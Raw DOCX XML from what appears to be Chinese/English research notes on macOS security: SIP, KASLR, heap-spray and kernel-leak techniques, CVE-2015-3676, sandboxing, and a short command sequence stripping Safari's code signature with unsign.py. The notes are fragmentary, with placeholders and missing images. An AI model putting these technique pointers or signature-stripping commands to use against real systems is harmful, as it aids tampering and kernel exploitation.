          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>SIP</w:t>
      </w:r>
      <w:r w:rsidRPr="004106D2">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>技术主要分为文件系统保护，运行时保护，内核扩展签名</w:t>
      </w:r>
      <w:r w:rsidRPr="004106D2">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="004106D2">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件系统保护主要是通过沙盒机制限制</w:t>
      </w:r>
      <w:r w:rsidRPr="004106D2">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r w:rsidRPr="004106D2">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>权限，运行时保护，主要就是保护关键进程无法被进程代码注入，挂调试器以及内核调试等，内核扩展签名，所有的第三方</w:t>
      </w:r>
      <w:r w:rsidRPr="004106D2">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>kext</w:t>
      </w:r>
      <w:r w:rsidRPr="004106D2">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>必须被安装到</w:t>
      </w:r>
      <w:r w:rsidRPr="004106D2">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/Library/Extensions</w:t>
      </w:r>
      <w:r w:rsidRPr="004106D2">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，并强制使用签名。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F93882" w:rsidRPr="00F93882" w:rsidRDefault="00153A72" w:rsidP="00F93882">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="380"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="262626"/>
          <w:sz w:val="38"/>
          <w:szCs w:val="38"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="262626"/>
          <w:sz w:val="38"/>
          <w:szCs w:val="38"/>
        </w:rPr>
        <w:t>OSX SIP机制的“那些事”</w:t>
      </w:r>
      <w:r w:rsidR="00F93882">
        <w:rPr>
          <w:rFonts w:ascii="MyriadSetPro-Thin" w:hAnsi="MyriadSetPro-Thin"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="96"/>
          <w:szCs w:val="96"/>
        </w:rPr>
        <w:t>n mechanism in the Recovery OS</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B74AF3" w:rsidRDefault="00B74AF3" w:rsidP="00B74AF3">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>disable SIP</w:t>
      </w:r>
      <w:r w:rsidRPr="003C51F7">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B74AF3" w:rsidRDefault="00B74AF3" w:rsidP="009A5D99">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="220"/>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B74AF3">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t>http://blog.ccjeng.com/2015/10/How-To-Disable-System-Integrity-Protection-OSX-El-Capitan.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B74AF3" w:rsidRDefault="004106D2" w:rsidP="009A5D99">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="220"/>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId82" w:history="1">
        <w:r w:rsidR="00B74AF3" w:rsidRPr="00683AB0">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
          </w:rPr>
          <w:t>http://www.jianshu.com/p/0572336a0771</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="008E2F41" w:rsidRDefault="008E2F41" w:rsidP="008E2F41">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>KASLR</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E2F41" w:rsidRDefault="00DA14FA" w:rsidP="00DA14FA">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="567"/>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t>X</w:t>
      </w:r>
      <w:r w:rsidR="001B52D7">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>xx</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F591F" w:rsidRDefault="004F591F" w:rsidP="00DA14FA">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="567"/>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004F591F">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Q:\</w:t>
      </w:r>
      <w:r w:rsidRPr="004F591F">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>崽子视频</w:t>
      </w:r>
      <w:r w:rsidRPr="004F591F">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>\2015-10-25-GeekPwn\Camera</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F591F" w:rsidRDefault="004F591F" w:rsidP="00DA14FA">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="567"/>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00DA14FA" w:rsidRDefault="00DA14FA" w:rsidP="00DA14FA">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>V</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>m_map_copy_t</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DA14FA" w:rsidRDefault="00DA14FA" w:rsidP="008E2F41">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00425809" w:rsidRDefault="00425809" w:rsidP="00425809">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="420"/>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>For heap spray</w:t>
      </w:r>
      <w:r w:rsidR="00721439">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> and info leak KASLR</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00721439" w:rsidRPr="00AA4C70" w:rsidRDefault="00BC6D1F" w:rsidP="00425809">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="420"/>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00721439">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>end_msg(mach_port_t port,)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001B52D7" w:rsidRDefault="001B52D7" w:rsidP="001B52D7">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>M</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ach_port_kobject</w:t>
      </w:r>
      <w:r w:rsidR="00534254">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(util 10.</w:t>
      </w:r>
      <w:r w:rsidR="001F604F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidR="00534254">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B74AF3" w:rsidRDefault="00811EB7" w:rsidP="009A5D99">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="220"/>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Randomize kobject address with v</w:t>
      </w:r>
      <w:r w:rsidR="001F604F">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>m_addr_perm imported since 10.8</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F591F" w:rsidRDefault="004F591F" w:rsidP="004F591F">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="220"/>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="7114571"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="44" name="Picture 44" descr="Q:\崽子视频\2015-10-25-GeekPwn\Camera\IMG_20151025_16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崽子视频\2015-10-25-GeekPwn\Camera\IMG_20151025_16335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7114571"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F591F" w:rsidRDefault="004F591F" w:rsidP="004F591F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IOReg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F591F" w:rsidRDefault="004F591F" w:rsidP="004F591F">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="220"/>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>xxxx8</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F591F" w:rsidRDefault="004F591F" w:rsidP="004F591F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CVE-2015-3676</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F591F" w:rsidRDefault="004F591F" w:rsidP="004F591F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004F591F" w:rsidRDefault="004F591F" w:rsidP="004F591F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="420"/>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>AppleGraphicsControlClient::uploadEDID</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F591F" w:rsidRDefault="00782BFF" w:rsidP="004F591F">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="220"/>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="587C7047" wp14:editId="4806D5D2">
            <wp:extent cx="5274310" cy="2490036"/>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490036"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00782BFF" w:rsidRPr="004F591F" w:rsidRDefault="00782BFF" w:rsidP="004F591F">
      <w:pPr>
        <w:ind w:firstLineChars="100" w:firstLine="220"/>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0DD13D9C" wp14:editId="265B44CB">
            <wp:extent cx="5274310" cy="194429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944291"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB6F65" w:rsidRDefault="00BB6F65" w:rsidP="00BB6F65">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="128" w:name="_Toc445313330"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Sandbox</w:t>
      </w:r>
      <w:bookmarkEnd w:id="128"/>
    </w:p>
    <w:p w:rsidR="00AA4C70" w:rsidRPr="00AA4C70" w:rsidRDefault="00AA4C70" w:rsidP="00AA4C70">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AA4C70">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t>Prevents apps from accessing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AA4C70">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t>core/OS level components</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB6F65" w:rsidRDefault="00AA4C70" w:rsidP="00BB6F65">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="129" w:name="_Toc445313331"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Code sign</w:t>
      </w:r>
      <w:bookmarkEnd w:id="129"/>
    </w:p>
    <w:p w:rsidR="00716C7F" w:rsidRDefault="00716C7F" w:rsidP="00716C7F">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t>Signatures are verified and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00716C7F">
        <w:rPr>
          <w:rFonts w:ascii="CMR10" w:hAnsi="CMR10" w:cs="CMR10"/>
        </w:rPr>
        <w:t>only signed Kexts can be loaded</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00716C7F" w:rsidRDefault="00716C7F" w:rsidP="00716C7F">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="130" w:name="_Toc445313332"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>pplication</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> loader</w:t>
      </w:r>
      <w:bookmarkEnd w:id="130"/>
    </w:p>
    <w:p w:rsidR="00895E15" w:rsidRDefault="00895E15" w:rsidP="00895E15">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">invalid signature exception </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00716C7F" w:rsidRDefault="00716C7F" w:rsidP="00895E15">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="220"/>
      </w:pPr>
      <w:r>
        <w:t>Process:</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Safari</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>[1599]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00716C7F" w:rsidRDefault="00716C7F" w:rsidP="00716C7F">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="220"/>
      </w:pPr>
      <w:r>
        <w:t>Path:</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>/Applications/Safari.app/Contents/MacOS/Safari</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00716C7F" w:rsidRDefault="00716C7F" w:rsidP="00716C7F">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="220"/>
      </w:pPr>
      <w:r>
        <w:t>Crashed Thread:</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00716C7F" w:rsidRDefault="00716C7F" w:rsidP="00895E15">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="220"/>
      </w:pPr>
      <w:r>
        <w:t>Exception Type:</w:t>
      </w:r>
      <w:r w:rsidRPr="00716C7F">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:tab/>
        <w:t>EXC_CRASH</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (Code Signature Invalid)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00716C7F" w:rsidRDefault="00716C7F" w:rsidP="00716C7F">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="220"/>
      </w:pPr>
      <w:r>
        <w:t>Exception Codes:0x0000000000000000, 0x0000000000000000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00895E15" w:rsidRDefault="00895E15" w:rsidP="00716C7F">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="220"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00895E15" w:rsidRDefault="00895E15" w:rsidP="00895E15">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">remove code </w:t>
      </w:r>
      <w:r>
        <w:t>signature</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00895E15" w:rsidRDefault="00895E15" w:rsidP="00895E15">
      <w:pPr>
        <w:keepNext/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="55F8546D" wp14:editId="32CBD036">
            <wp:extent cx="5274310" cy="1139104"/>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139104"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00895E15" w:rsidRPr="00895E15" w:rsidRDefault="00895E15" w:rsidP="00895E15">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="003D4234">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>27</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Application code signature in Mac-O</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00895E15" w:rsidRDefault="00895E15" w:rsidP="00895E15">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t># md5 Safari.app/Contents/MacOS/Safari --</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>‐</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; 633d043cf9742d6f0787acdee742c10d </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00895E15" w:rsidRDefault="00895E15" w:rsidP="00895E15">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="220"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"># unsign.py Safari.app/Contents/MacOS/Safari Safari code signature removed </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00895E15" w:rsidRDefault="00895E15" w:rsidP="00895E15">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="220"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t># md5 Safari.app/Contents/MacOS/Safari --</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>‐</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt; 825edd6a1e3aefa98d7cf99a60bac409 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00895E15" w:rsidRDefault="00895E15" w:rsidP="00895E15">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="220"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">$ open Safari.app/Contents/MacOS/Safari </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00895E15" w:rsidRPr="00716C7F" w:rsidRDefault="00895E15" w:rsidP="00895E15">
      <w:pPr>
        <w:ind w:leftChars="100" w:left="220"/>
      </w:pPr>
